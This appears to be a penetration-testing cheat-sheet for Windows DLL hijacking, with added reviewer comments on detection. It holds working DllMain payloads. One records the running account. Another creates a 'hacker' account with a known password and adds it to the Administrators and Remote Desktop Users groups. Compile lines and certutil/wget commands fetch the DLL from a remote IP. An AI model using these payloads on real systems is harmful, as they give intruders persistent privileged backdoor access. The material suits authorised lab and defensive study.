windows_dll.c
setup
code
windows_dll.c
#include <windows.h>
/*
 * DllMain - entry point of a proof-of-concept DLL that shows code runs
 * as soon as a process loads the library.
 *
 * hDll, lpReserved: not used by this function.
 * dwReason: only DLL_PROCESS_ATTACH triggers the payload.
 * Returns TRUE for every other notification. On process attach it does
 * not return, because ExitProcess(0) terminates the loading process.
 *
 * Reviewer notes (defensive view):
 *  - The command inherits the identity and privileges of whichever
 *    process loads the DLL. The whoami output redirected to the file is
 *    what records that identity.
 *  - system() starts a command interpreter as a child of the loading
 *    process. Process-creation telemetry (Security event 4688, or
 *    Sysmon event 1) will show cmd.exe with an unexpected parent.
 *  - This work happens inside DllMain, i.e. during library load, where
 *    Microsoft's guidance is to avoid creating processes.
 */
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
/* Marker only: writes the current account name to a file and makes no other change. */
system("whoami > C:\\temp\\message.txt");
/* Ends the host process with exit code 0, so the loading program never continues. */
ExitProcess(0);
}
return TRUE;
}
windows_dll.c
#include <windows.h>
/*
 * DllMain - entry point of a second variant that changes local accounts
 * instead of writing a marker file.
 *
 * hDll, lpReserved: not used by this function.
 * dwReason: only DLL_PROCESS_ATTACH triggers the payload.
 * Returns TRUE for every other notification. The process-attach branch
 * ends in ExitProcess(0), which terminates the loading process.
 *
 * Reviewer notes (defensive view):
 *  - The three commands are issued in order: create a local account,
 *    then request membership of the Administrators group and of the
 *    Remote Desktop Users group. They can only succeed if the loading
 *    process already holds the rights to manage local accounts.
 *  - The account name and password are hard-coded and identical, so any
 *    host where this has run carries a known-credential account. Nothing
 *    in this code removes the account or the group memberships, so they
 *    persist until deleted explicitly.
 *  - Expected audit trail on the host: Security event 4720 (user account
 *    created), 4732 (member added to a security-enabled local group),
 *    and process creation (4688 / Sysmon 1) for cmd.exe and net started
 *    from a parent that does not normally spawn them.
 */
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
/* Local account creation with a fixed, guessable credential. */
system("cmd.exe /k net user hacker hacker /add");
/* Asks for the new account to be placed in the local Administrators group. */
system("cmd.exe /k NET LOCALGROUP 'Administrators' hacker /ADD");
/* Asks for the new account to be placed in the group that permits RDP logon. */
system("cmd.exe /k NET LOCALGROUP 'Remote Desktop Users' hacker /ADD");
/* Terminates the host process with exit code 0. */
ExitProcess(0);
}
return TRUE;
}
compile
deliver
certutil -urlcache -f http://192.168.45.171/windows.dll windows.dll
wget http://192.168.45.171/windows.dll -O windows.dll
other
- poc
/* Marker-only alternative for the DllMain body: redirects the whoami
 * output to C:\Windows\Temp\dll.txt, recording which account the loading
 * process runs as. It does not touch accounts or groups. */
system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt");
- For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
- For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
- source: https://github.com/sagishahar/scripts